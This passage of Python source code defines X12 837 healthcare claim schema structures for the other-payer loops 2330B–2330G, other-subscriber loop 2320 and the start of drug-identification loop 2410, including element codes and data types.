req_sit="N", seq="04" ), ), ), ) parsed_837_2330B = Loop( "2330B", Properties( desc="Other Payer Name", looptype="", position="3250", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Other Payer Name", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PR"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["PI", "XV"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Other Payer Address", position="3320", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Other Payer City, State, ZIP Code", position="3400", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "DTP", Properties( desc="Claim Check or Remittance Date", position="3450", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["573"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Secondary Identifier", position="3550", repeat="2", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["2U", "EI", "FY", "NF"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Prior Authorization Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Referral Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Claim Adjustment Indicator", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["T4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Claim Control Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F8"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330C = Loop( "2330C", Properties( desc="Other Payer Referring Provider", looptype="", position="3250", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Referring Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Referring Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330D = Loop( "2330D", Properties( desc="Other Payer Rendering Provider", looptype="", position="3650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Rendering Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Rendering Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330E = Loop( "2330E", Properties( desc="Other Payer Service Facility Location", looptype="", position="4650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Service Facility Location", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Service Facility Location Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330F = Loop( "2330F", Properties( desc="Other Payer Supervising Provider", looptype="", position="5650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Supervising Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Supervising Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330G = Loop( "2330G", Properties( desc="Other Payer Billing Provider", looptype="", position="6350", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Billing Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["85"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Billing Provider Secondary Identification", position="3550", repeat="2", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2320 = Loop( "2320", Properties( desc="Other Subscriber Information", looptype="", position="2900", repeat="10", req_sit="S", ), Segment( "SBR", Properties( desc="Other Subscriber Information", position="2900", repeat="1", req_sit="R", syntax="", ), Element( "SBR01", Properties( desc="Payer Responsibility Sequence Number Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["A", "B", "C", "D", "E", "F", "G", "H", "P", "S", "T", "U"], ), ), Element( "SBR02", Properties( desc="Individual Relationship Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["01", "18", "19", "20", "21", "39", "40", "53", "G8"], ), ), Element( "SBR03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "SBR04", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=4, codes=[], ), ), Element( "SBR05", Properties( desc="Insurance Type Code", req_sit="S", data_type=("ID", "1", "3"), position=5, codes=["12", "13", "14", "15", "16", "41", "42", "43", "47"], ), ), Element( "SBR06", Properties( desc="Coordination of Benefits Code", req_sit="N", data_type=("ID", "1", "1"), position=6, codes=[], ), ), Element( "SBR07", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), Element( "SBR08", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "SBR09", Properties( desc="Claim Filing Indicator Code", req_sit="S", data_type=("ID", "1", "2"), position=9, codes=[ "11", "12", "13", "14", "15", "16", "17", "AM", "BL", "CH", "CI", "DS", "FI", "HM", "LM", "MA", "MB", "MC", "OF", "TV", "VA", "WC", "ZZ", ], ), ), ), Segment( "CAS", Properties( desc="Claim Level Adjustments", position="2950", repeat="5", req_sit="S", syntax="L050607 C0605 C0705 L080910 C0908 C1008 L111213 C1211 C1311 L141516 C1514 C1614 L171819 C1817 C1917", ), Element( "CAS01", Properties( desc="Claim Adjustment Group Code", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["CO", "CR", "OA", "PI", "PR"], ), ), Element( "CAS02", Properties( desc="Claim Adjustment Reason Code", req_sit="R", data_type=("ID", "1", "5"), position=2, codes=[], ), ), Element( "CAS03", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "CAS04", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CAS05", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=5, codes=[], ), ), Element( "CAS06", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=6, codes=[], ), ), Element( "CAS07", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CAS08", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=8, codes=[], ), ), Element( "CAS09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), Element( "CAS10", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CAS11", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=11, codes=[], ), ), Element( "CAS12", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=12, codes=[], ), ), Element( "CAS13", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CAS14", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=14, codes=[], ), ), Element( "CAS15", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=15, codes=[], ), ), Element( "CAS16", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=16, codes=[], ), ), Element( "CAS17", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=17, codes=[], ), ), Element( "CAS18", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=18, codes=[], ), ), Element( "CAS19", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=19, codes=[], ), ), ), Segment( "AMT", Properties( desc="Coordination of Benefits (COB) Payer Paid Amount", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["D"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Coordination of Benefits (COB) Total Non-Covered Amount", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["A8"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Remaining Patient Liability", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["EAF"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "OI", Properties( desc="Other Insurance Coverage Information", position="3100", repeat="1", req_sit="R", syntax="", ), Element( "OI01", Properties( desc="Claim Filing Indicator Code", req_sit="N", data_type=("ID", "1", "2"), position=1, codes=[], ), ), Element( "OI02", Properties( desc="Claim Submission Reason Code", req_sit="N", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "OI03", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=3, codes=["N", "W", "Y"], ), ), Element( "OI04", Properties( desc="Patient Signature Source Code", req_sit="S", data_type=("ID", "1", "1"), position=4, codes=["P"], ), ), Element( "OI05", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=5, codes=[], ), ), Element( "OI06", Properties( desc="Release of Information Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["I", "Y"], ), ), ), Segment( "MOA", Properties( desc="Outpatient Adjudication Information", position="3200", repeat="1", req_sit="S", syntax="", ), Element( "MOA01", Properties( desc="Percentage as Decimal", req_sit="S", data_type=("R", "1", "10"), position=1, codes=[], ), ), Element( "MOA02", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "MOA03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "MOA04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "MOA05", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=5, codes=[], ), ), Element( "MOA06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "MOA07", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=7, codes=[], ), ), Element( "MOA08", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "MOA09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), ), parsed_837_2330A, parsed_837_2330B, parsed_837_2330C, parsed_837_2330D, parsed_837_2330E, parsed_837_2330F, parsed_837_2330G, ) parsed_837_2410 = Loop( "2410", Properties( desc="Drug Identification", looptype="", position="4940", repeat="1", req_sit="S", ), Segment( "LIN", Properties( desc="Drug Identification", position="4930", repeat="1", req_sit="R", syntax="P0405 P0607 P0809 P1011 P1213 P1415 P1617 P1819 P2021 P2223 P2425 P2627 P2829 P3031", ), Element( "LIN01", Properties( desc="Assigned Identification", req_sit="N", data_type=("AN", "1", "20"), position=1, codes=[], ), ), Element( "LIN02", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["EN", "EO", "HI", "N4", "ON", "UK", "UP"], ), ), Element( "LIN03", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=3, codes=[], ), ), Element( "LIN04", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Element( "LIN05", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=5, codes=[], ), ), Element( "LIN06", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=6, codes=[], ), ), Element( "LIN07", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), Element( "LIN08", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "LIN09", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=9, codes=[], ), ), Element( "LIN10", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "LIN11", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=11, codes=[], ), ), Element( "LIN12", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=12, codes=[], ), ), Element( "LIN13", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=13, codes=[], ), ), Element( "LIN14", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=14, codes=[], ), ), Element( "LIN15", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=15, codes=[], ), ), Element( "LIN16", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=16, codes=[], ), ), Element( "LIN17", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=17, codes=[], ), ), Element( "LIN18", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=18, codes=[], ), ), Element( "LIN19", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=19, codes=[], ), ), Element( "LIN20", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=20, codes=[], ), ), Element( "LIN21", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=21, codes=[], ), ), Element( "LIN22", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=22, codes=[], ), ), Element( "LIN23", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=23, codes=[], ), ), Element( "LIN24", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=24, codes=[], ), ), Element( "LIN25", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=25, codes=[], ), ), Element( "LIN26", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=26, codes=[], ), ), Element( "LIN27", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=27, codes=[], ), ), Element( "LIN28", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=28, codes=[], ), ), Element( "LIN29", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=29, codes=[], ), ), Element( "LIN30", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=30, codes=[], ), ), Element( "LIN31", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=31, codes=[], ), ), ), Segment( "CTP", Properties( desc="Drug Quantity", position="4940", repeat="1", req_sit="R", syntax="P0405 C0607 C0902 C1002 C1103", ), Element( "CTP01", Properties( desc="Class of Trade Code", req_sit="N", data_type=("ID", 